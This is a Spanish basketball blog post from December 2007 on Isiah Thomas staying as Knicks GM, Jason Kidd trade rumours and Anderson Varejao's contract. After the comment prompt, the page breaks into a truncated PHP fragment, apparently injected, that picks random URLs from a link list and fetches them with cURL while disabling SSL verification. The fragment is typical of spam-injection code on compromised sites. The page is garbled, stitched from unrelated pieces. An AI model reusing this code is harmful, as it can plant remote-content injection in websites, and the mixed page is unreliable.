Thomas no será despedido

10 de December de 2007 por txusma

Si había alguien preocupado por que Isiah Thomas fuera despedido fulminantemente de los New York debido a sus múltiples errores como GM, que se tranquilice. El propietario, James Dolan, ha desestimado la petición de su afición y ha asegurado a Thomas que tiene toda su confianza y que en ningún caso debe preocuparse por mantener su puesto de trabajo. Contento con esta afirmación, Isiah intenta convencer a todos de que está haciendo un buen trabajo y los Knicks caminan en la dirección correcta.

Últimamente la estrella de la rumorología es el genial base Jason Kidd. El rumor que lo sitúa en Dallas sigue creciendo y ya incluso se habla de jugadores involucrados como Devin Harris, Jerry Stackhouse o Jason Terry. Parece ser que el actual estado de desencanto de Kidd viene a raíz de una negativa de la directiva a ofrecerle una extensión de contrato a mediados de noviembre. En todo caso, su situación está provocando un arduo debate dentro de la propia franquicia entre el propietario, Bruce Ratner, que no quiere traspasarlo y que le ofrecería una ampliación de contrato por 10 millones de dólares, y Rod Thorn, que no vería con malos ojos un traspaso y que se niega en redondo ofrecer una extensión de contrato a un jugador que el año que viene cumplirá 37 años y cobrará 21 millones de dólares. De producirse el trade, nadie duda de que los New Jersey Nets entrarían en un largo proceso de reconstrucción. Los que no tienen ninguna posibilidades de hacerse con sus servicios es una de las franquicias que más aparecen por aquí últimamente por su falta de base: los Cleveland Cavaliers, básicamente por que no tienen absolutamente nada que pueda interesar a los Nets. Deberán conformarse con Andre Millier, que parece que es su favorito.

Hablando de los Cavs, no podemos dejar de comentar cómo está el caso Varejao, del que no dejan de aparecer informaciones pasadas, presentes y futuras. Entre ellas, que los New York Knicks, ante su evidente falta de jugadores grandes, fue uno de los 3 equipos que negociaron con los Cavs un posible sign & trade. Los otros dos equipos serían los Charlotte Bobcats, que podrían haber ofrecido rondas de draft más algún expiring como Herrmann o Brezec, y los Sacramento Kings, que incluían a Mike Bibby en el traspaso. Como todavía no está claro donde jugará Varejao el próximo año, los Cavs han fijado su atención en Robert ‘Tractor’ Traylor, que actualmente juega en la liga de Puerto Rico y que el año pasado se dejó ver por la LEB-2.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>